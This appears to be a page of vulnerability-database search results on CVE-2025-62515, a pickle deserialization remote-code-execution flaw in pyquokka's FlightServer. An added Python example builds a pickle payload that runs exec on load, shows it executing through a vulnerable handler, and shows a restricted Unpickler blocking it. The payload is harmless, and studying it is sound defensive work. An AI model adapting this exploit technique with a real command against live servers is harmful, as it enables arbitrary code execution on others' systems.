12 matches found
Remote Code Execution (RCE)
pyquokka is vulnerable to Remote Code Execution (RCE). The vulnerability is due to unsafe deserialization using pickle.loads on untrusted input without validation, which allows an attacker to execute arbitrary code by sending malicious payloads...
CVE-2025-62515
pyquokka is a framework for making data lakes work for time series. In versions 0.3.1 and prior, the FlightServer class directly uses pickle.loads to deserialize action bodies received from Flight clients without any sanitization or validation in the do_action method. The vulnerable code is locate...
Exploit for CVE-2025-62515
pyquokka-rce-poc...
Deserialization of Untrusted Data
Overview: pyquokka is a Quokka Affected versions of this package are vulnerable to Deserialization of Untrusted Data via the do_action function in the flight.py file. An attacker can execute arbitrary code on the server by sending maliciously crafted serialized data through the network interface...
CVE-2025-62515 Remote Code Execution by Pickle Deserialization via FlightServer in pyquokka
pyquokka is a framework for making data lakes work for time series. In versions 0.3.1 and prior, the FlightServer class directly uses pickle.loads to deserialize action bodies received from Flight clients without any sanitization or validation in the do_action method. The vulnerable code is locate...
CVE-2025-62515
CVE-2025-62515 affects pyquokka ≤ 0.3.1. The FlightServer’s do_action() deserializes untrusted data with Python’s unsafe pickle.loads(), specifically in pyquokka/flight.py around line 283, enabling arbitrary remote code execution when the server is exposed (e.g., binding to 0.0.0.0) and handling ...
GHSA-F74J-GFFQ-VM9P pyquokka is Vulnerable to Remote Code Execution by Pickle Deserialization via FlightServer
Description: In the FlightServer class of the pyquokka framework, the do_action method directly uses pickle.loads to deserialize action bodies received from Flight clients without any sanitization or validation, which results in a remote code execution vulnerability. The vulnerable code is located...
pyquokka is Vulnerable to Remote Code Execution by Pickle Deserialization via FlightServer
Description: In the FlightServer class of the pyquokka framework, the do_action method directly uses pickle.loads to deserialize action bodies received from Flight clients without any sanitization or validation, which results in a remote code execution vulnerability. The vulnerable code is located...
EUVD-2025-34900
pyquokka is Vulnerable to Remote Code Execution by Pickle Deserialization via FlightServer...
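The pattern every entry above describes, reproduced as an added example that is not pyquokka's code and does not use pyarrow: a handler that calls pickle.loads on a client-supplied action body, the body an attacker would send to it, and a hardened handler built on a restricted Unpickler that refuses to resolve globals. The Flight transport is left out; the handler is called with the raw bytes a do_action implementation would receive. The names vulnerable_do_action, hardened_do_action, MaliciousAction and the PYQUOKKA_POC environment variable are assumptions of this example, and the payload only sets that variable so its execution is observable without doing harm.

```python
"""Added example (not pyquokka's code): pickle.loads on a Flight action body.

A real FlightServer receives the body as bytes inside do_action(); here the
Flight transport is left out and each handler is called with the bytes directly.
"""
import io
import os
import pickle
from typing import Any

MARKER_VAR = "PYQUOKKA_POC"  # assumed name; only used to observe the payload running


class MaliciousAction:
    """Constructed attacker object: on loads(), pickle calls exec(COMMAND)."""

    COMMAND = f"import os; os.environ['{MARKER_VAR}'] = 'pwned'"

    def __reduce__(self):
        # pickle stores this as GLOBAL builtins.exec plus the argument tuple;
        # loads() calls exec(COMMAND) before it returns anything to the caller.
        return (exec, (self.COMMAND,))


def build_malicious_body() -> bytes:
    """The bytes an attacker would send as the action body."""
    return pickle.dumps(MaliciousAction())


def vulnerable_do_action(body: bytes) -> Any:
    """The vulnerable pattern from the advisories: raw pickle.loads on client data."""
    return pickle.loads(body)


class RestrictedUnpickler(pickle.Unpickler):
    """Refuses every GLOBAL/STACK_GLOBAL lookup except an explicit allow-list.

    Plain containers and scalars (dict, list, str, int, bytes, ...) are built
    from opcodes and never reach find_class, so they still load normally.
    """

    ALLOWED: set[tuple[str, str]] = set()  # add (module, name) pairs deliberately

    def find_class(self, module: str, name: str) -> Any:
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def hardened_do_action(body: bytes) -> Any:
    """Same entry point, but arbitrary callables cannot be resolved."""
    return RestrictedUnpickler(io.BytesIO(body)).load()


def demo() -> dict[str, Any]:
    """Run the payload through both handlers and report what happened."""
    os.environ.pop(MARKER_VAR, None)
    body = build_malicious_body()

    vulnerable_do_action(body)
    executed = os.environ.get(MARKER_VAR) == "pwned"  # True: exec ran during loads()
    os.environ.pop(MARKER_VAR, None)

    try:
        hardened_do_action(body)
        blocked = False
    except pickle.UnpicklingError:
        blocked = True
    side_effect = os.environ.get(MARKER_VAR)  # None: exec never ran

    benign = hardened_do_action(pickle.dumps({"op": "ping", "n": 1}))
    return {
        "vulnerable_executed": executed,
        "hardened_blocked": blocked,
        "hardened_side_effect": side_effect,
        "benign_loads": benign,
    }


if __name__ == "__main__":
    print(demo())
```

The restricted Unpickler is a mitigation, not the real fix: the durable change is to stop accepting pickle from the network at all and carry action bodies in a structured format the server parses explicitly (JSON, or Arrow's own IPC types). Note also that exec runs before loads() returns, so validating the deserialized object afterwards cannot help. A quick check for the pattern in any Flight server is to search flight.py for pickle.loads inside do_action and confirm the body reaches it unparsed.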